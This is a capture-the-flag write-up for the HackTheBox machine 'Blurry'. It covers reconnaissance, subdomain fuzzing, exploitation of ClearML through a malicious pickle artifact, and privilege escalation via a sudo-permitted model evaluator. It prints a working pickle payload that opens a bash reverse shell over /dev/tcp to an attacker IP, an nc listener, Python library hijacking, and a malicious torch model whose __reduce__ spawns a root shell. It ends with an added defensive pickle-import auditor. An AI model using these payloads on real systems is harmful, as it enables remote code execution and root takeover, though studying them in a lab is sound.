HackTheBox - Blurry

0x1 Initial Reconnaissance

Nmap Results:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0

0x2 Subdomain Enumeration

ffuf -u "http://IP" -H "Host: FUZZ.blurry.htb" -w /path/to/wordlist -fs 169

Found Subdomains:

  • app.blurry.htb
  • files.blurry.htb
  • chat.blurry.htb

0x3 Exploiting ClearML

  • Registering on ClearML:

pip install clearml
clearml-init

Update clearml.conf with:

api {
  web_server: http://app.blurry.htb
  api_server: http://app.blurry.htb/api
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "KEY"
    "secret_key" = "SECRET"
  }
}

  • Uploading a Malicious Artifact:

import pickle, os

class RunCommand:
    def __reduce__(self):
        return (os.system, ('/bin/bash -c "/bin/bash -i >& /dev/tcp/IP/4444 0>&1"',))

command = RunCommand()

from clearml import Task
task = Task.init(project_name='Black Swan', task_name='pickle_artifact_upload', tags=["review"])
task.upload_artifact(name='pickle_artifact', artifact_object=command, retries=2, wait_on_upload=True, extension_name=".pkl")

Set up a listener on your machine:

nc -lvnp 4444

0x4 Privilege Escalation

  • Sudo Permissions:

(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

  • Hijacking Python Libraries:

echo 'import os; os.system("bash")' > /models/torch.py
sudo /usr/bin/evaluate_model /models/demo_model.pth

  • Replace evaluate_model.py:

jippity@blurry:/models$ rm evaluate_model.py
rm: remove write-protected regular file 'evaluate_model.py'? y
jippity@blurry:/models$ echo 'import os; os.system("bash")' > evaluate_model.py
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth

  • Custom malicious model:

import torch
import torch.nn as nn
import os

class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.linear = nn.Linear(10, 1)

    def forward(self, hi):
        return self.linear(hi)

    def __reduce__(self):
        cmd = "bash"
        return os.system, (cmd,)

model = CustomModel()
torch.save(model, '/models/root.pth')

Run the model evaluation:

sudo /usr/bin/evaluate_model /models/root.pth
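
Both the pickled ClearML artifact in 0x3 and the custom model file in 0x4 run a command because unpickling calls whatever `__reduce__` names. The following is an added example, not part of the original writeup: it lists the imports a pickle would perform without loading it and flags any outside an allowlist. `ALLOWED`, `imported_globals`, `audit` and `ConstructedSample` are names assumed here, and the scan is a heuristic intended for streams written by the standard pickler.

```python
import io
import os
import pickle
import pickletools
import zipfile

# Assumed allowlist for this example; extend it with the globals your own data needs.
ALLOWED = {("collections", "OrderedDict")}
STRINGS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
PUTS = {"PUT", "BINPUT", "LONG_BINPUT"}
GETS = {"GET", "BINGET", "LONG_BINGET"}

def imported_globals(stream):
    """List the (module, name) pairs a pickle stream imports, without loading it."""
    found, pushed, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(stream):
        if op.name in STRINGS:
            last = arg
            pushed.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last          # remember strings for later GETs
        elif op.name in PUTS:
            memo[arg] = last
        elif op.name in GETS:
            last = memo.get(arg)
            pushed.append(last)
        else:
            if op.name in ("GLOBAL", "INST"):
                found.append(tuple(arg.split(" ", 1)))
            elif op.name == "STACK_GLOBAL":
                # Heuristic: operands are the two latest string pushes; unknown fails closed.
                pair = tuple(pushed[-2:])
                found.append(pair if len(pair) == 2 and all(pair) else ("?", "?"))
            last = None
    return found

def audit(blob, allowed=ALLOWED):
    """Return (member, module, name) for every import outside the allowlist."""
    streams = {"<raw>": blob}
    if zipfile.is_zipfile(io.BytesIO(blob)):    # torch.save zip layout: <name>/data.pkl
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            streams = {m: zf.read(m) for m in zf.namelist() if m.endswith(".pkl")}
    return [(member, *pair) for member, data in streams.items()
            for pair in imported_globals(data) if pair not in allowed]

class ConstructedSample:
    """Constructed test object: its __reduce__ names a harmless callable (os.getpid)."""
    def __reduce__(self):
        return (os.getpid, ())
```

An empty list from `audit` means nothing outside the allowlist was found. For model files, `torch.load(..., weights_only=True)` applies a comparable restriction at load time.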